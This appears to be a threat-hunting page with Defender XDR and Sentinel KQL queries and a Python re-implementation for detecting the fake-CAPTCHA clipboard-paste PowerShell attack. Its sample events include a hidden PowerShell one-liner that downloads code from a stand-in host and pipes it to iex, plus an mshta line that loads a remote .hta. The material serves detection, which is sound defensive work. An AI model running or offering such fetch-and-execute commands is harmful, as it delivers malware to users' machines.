Power Shell Executions From Clipboard

Query

# Malicious PowerShell Executions From Clipboard Copy-and-Paste

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title | Link |
| --- | --- | --- |
| T1204.001 | User Execution: Malicious Link | https://attack.mitre.org/techniques/T1204/001/ |

#### Description
This query hunts for the Fake CAPTCHA / bot-verification social engineering technique, in which the actor lures the victim into clicking a copy-and-paste button on a website. The copied text is a malicious PowerShell command that retrieves a second-stage payload and executes it on the victim's device. The query detects clipboard data being accessed by the shell, followed by a PowerShell execution on the same device within a one-minute window.

#### Risk
Malicious PowerShell execution resulting from Fake CAPTCHA / bot-verification social engineering.

#### Author
Github: [ch4meleon](https://github.com/ch4meleon)

#### References
- https://pkcert.gov.pk/advisory/24-19.pdf
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/
- https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages
- https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6

## Defender XDR
```
// Clipboard reads performed by explorer.exe (for example the victim pasting into an explorer-hosted dialog such as Run)
let clipboardEvents =
    DeviceEvents
    | where ActionType contains "GetClipboardData"
        and InitiatingProcessFileName contains "explorer.exe";
// PowerShell launched hidden with a remote URL, or mshta.exe with a remote URL; localhost URLs are excluded
let powershellEvents =
    DeviceProcessEvents
    | where (FileName contains "powershell.exe"
            and ProcessCommandLine contains "hidden"
            and ProcessCommandLine contains "http"
            and ProcessCommandLine !contains "http://localhost")
        or (FileName contains "mshta.exe"
            and ProcessCommandLine contains "http"
            and ProcessCommandLine !contains "http://localhost");
clipboardEvents
| join kind=inner (powershellEvents) on DeviceName
// Defender XDR advanced hunting exposes the event time as Timestamp (TimeGenerated is the Sentinel column name)
| where abs(datetime_diff('minute', Timestamp, Timestamp1)) <= 1
| summarize by DeviceName
```

## Sentinel
```
// Clipboard reads performed by explorer.exe (for example the victim pasting into an explorer-hosted dialog such as Run)
let clipboardEvents =
    DeviceEvents
    | where ActionType contains "GetClipboardData"
        and InitiatingProcessFileName contains "explorer.exe";
// PowerShell launched hidden with a remote URL, or mshta.exe with a remote URL; localhost URLs are excluded
let powershellEvents =
    DeviceProcessEvents
    | where (FileName contains "powershell.exe"
            and ProcessCommandLine contains "hidden"
            and ProcessCommandLine contains "http"
            and ProcessCommandLine !contains "http://localhost")
        or (FileName contains "mshta.exe"
            and ProcessCommandLine contains "http"
            and ProcessCommandLine !contains "http://localhost");
clipboardEvents
| join kind=inner (powershellEvents) on DeviceName
// Both event sets carry TimeGenerated; the right-hand side is suffixed with 1 after the join
| where abs(datetime_diff('minute', TimeGenerated, TimeGenerated1)) <= 1
| summarize by DeviceName
```

Explanation

This query is designed to detect potentially malicious activity in which a PowerShell script is executed as the result of a social engineering attack that uses a fake CAPTCHA or bot-verification prompt. A breakdown of what the query does:

1. Objective: identify instances where a user is tricked into copying and pasting a malicious PowerShell command from a website, which then executes on their device.

2. Technique: the attack uses a fake CAPTCHA or bot-verification prompt to deceive the user into executing a harmful script.

3. Detection method:
   - The query looks for two types of events:
     - Clipboard access: events where clipboard data is accessed (the `GetClipboardData` action) by the `explorer.exe` process, which is what a paste into an explorer-hosted dialog such as Run produces.
     - PowerShell execution: `powershell.exe` processes whose command line contains `hidden` and `http`, or `mshta.exe` processes whose command line contains `http`; in both cases `http://localhost` is excluded to filter out local testing.
   - It then correlates the two event sets by matching them on the same device and requiring that they occur within one minute of each other.

4. Output: the query lists the devices on which both a clipboard access and a suspicious PowerShell or mshta.exe execution occur in close succession, which suggests possible malicious activity.

5. Purpose: this helps security teams identify and respond to threats in which users are tricked into executing harmful scripts.
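The correlation the query performs, re-implemented in Python over a handful of constructed events so that the two filters and the one-minute, per-device join can be exercised offline. This is an added example and not code from the original page or from the query's author; the event dictionaries mimic the `DeviceEvents` / `DeviceProcessEvents` columns the query reads, and every device name, URL and timestamp is constructed.

```python
from datetime import datetime, timedelta

# Constructed sample telemetry shaped like the columns the KQL query reads.
# None of this is real data.
DEVICE_EVENTS = [
    # ws01: explorer.exe reads the clipboard at 10:00:05
    {"DeviceName": "ws01", "ActionType": "GetClipboardData",
     "InitiatingProcessFileName": "explorer.exe",
     "Timestamp": datetime(2025, 1, 22, 10, 0, 5)},
    # ws02: explorer.exe reads the clipboard at 11:00:00
    {"DeviceName": "ws02", "ActionType": "GetClipboardData",
     "InitiatingProcessFileName": "explorer.exe",
     "Timestamp": datetime(2025, 1, 22, 11, 0, 0)},
    # ws03: clipboard read by a different process, so it never enters the join
    {"DeviceName": "ws03", "ActionType": "GetClipboardData",
     "InitiatingProcessFileName": "WINWORD.EXE",
     "Timestamp": datetime(2025, 1, 22, 12, 0, 0)},
]

PROCESS_EVENTS = [
    # ws01: hidden PowerShell with a remote URL, 20 s after the clipboard read -> hit
    {"DeviceName": "ws01", "FileName": "powershell.exe",
     "ProcessCommandLine": 'powershell.exe -w hidden -c "iwr http://example.invalid/p | iex"',
     "Timestamp": datetime(2025, 1, 22, 10, 0, 25)},
    # ws02: same pattern but five minutes later -> outside the window
    {"DeviceName": "ws02", "FileName": "powershell.exe",
     "ProcessCommandLine": 'powershell.exe -w hidden -c "iwr http://example.invalid/p"',
     "Timestamp": datetime(2025, 1, 22, 11, 5, 0)},
    # ws02: inside the window, but the URL is localhost -> excluded by the filter
    {"DeviceName": "ws02", "FileName": "powershell.exe",
     "ProcessCommandLine": 'powershell.exe -w hidden -c "iwr http://localhost:8080/"',
     "Timestamp": datetime(2025, 1, 22, 11, 0, 30)},
    # ws03: mshta.exe with a remote URL passes the process filter,
    # but ws03 has no explorer.exe clipboard read to pair it with
    {"DeviceName": "ws03", "FileName": "mshta.exe",
     "ProcessCommandLine": "mshta.exe http://example.invalid/a.hta",
     "Timestamp": datetime(2025, 1, 22, 12, 0, 10)},
]


def _contains(haystack, needle):
    """Case-insensitive substring test, matching the semantics of KQL `contains`."""
    return needle.lower() in haystack.lower()


def is_clipboard_read(ev):
    """Mirror of the clipboardEvents filter: GetClipboardData initiated by explorer.exe."""
    return (_contains(ev["ActionType"], "GetClipboardData")
            and _contains(ev["InitiatingProcessFileName"], "explorer.exe"))


def is_suspicious_launch(ev):
    """Mirror of the powershellEvents filter.

    powershell.exe must be hidden and reference a non-localhost URL;
    mshta.exe only needs to reference a non-localhost URL.
    """
    cmd = ev["ProcessCommandLine"]
    remote_url = _contains(cmd, "http") and not _contains(cmd, "http://localhost")
    if _contains(ev["FileName"], "powershell.exe"):
        return remote_url and _contains(cmd, "hidden")
    if _contains(ev["FileName"], "mshta.exe"):
        return remote_url
    return False


def correlate(device_events, process_events, window=timedelta(minutes=1)):
    """Inner join on DeviceName, keeping pairs whose timestamps lie within `window`.

    Returns one record per matching (clipboard read, process launch) pair so the
    analyst keeps the command line, which `summarize by DeviceName` would drop.
    """
    clips = [e for e in device_events if is_clipboard_read(e)]
    launches = [e for e in process_events if is_suspicious_launch(e)]
    hits = []
    for clip in clips:
        for proc in launches:
            if clip["DeviceName"] != proc["DeviceName"]:
                continue
            if abs(proc["Timestamp"] - clip["Timestamp"]) <= window:
                hits.append({
                    "DeviceName": clip["DeviceName"],
                    "ClipboardTime": clip["Timestamp"],
                    "ProcessTime": proc["Timestamp"],
                    "ProcessCommandLine": proc["ProcessCommandLine"],
                })
    return hits


def affected_devices(device_events, process_events):
    """Equivalent of the query's final `summarize by DeviceName`."""
    return sorted({h["DeviceName"] for h in correlate(device_events, process_events)})


if __name__ == "__main__":
    for hit in correlate(DEVICE_EVENTS, PROCESS_EVENTS):
        print(hit["DeviceName"], hit["ClipboardTime"], hit["ProcessTime"], hit["ProcessCommandLine"])
    print("devices:", affected_devices(DEVICE_EVENTS, PROCESS_EVENTS))
```

Two differences from the KQL are deliberate. First, `correlate` returns each matching pair with its command line rather than only the device name, which is what an analyst needs to triage the hit. Second, the Python uses an exact 60-second window, whereas KQL's `datetime_diff('minute', …)` counts calendar-minute boundaries crossed, so the original `<= 1` can admit pairs up to just under two minutes apart; tighten it with `datetime_diff('second', …)` if the wider window produces noise.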

Details

Bert-Jan Pals

Released: January 22, 2025

Tables

- DeviceEvents
- DeviceProcessEvents

Keywords

Devices

Operators

let, contains, and, or, !contains, join, on, where, abs, datetime_diff, <=, summarize, by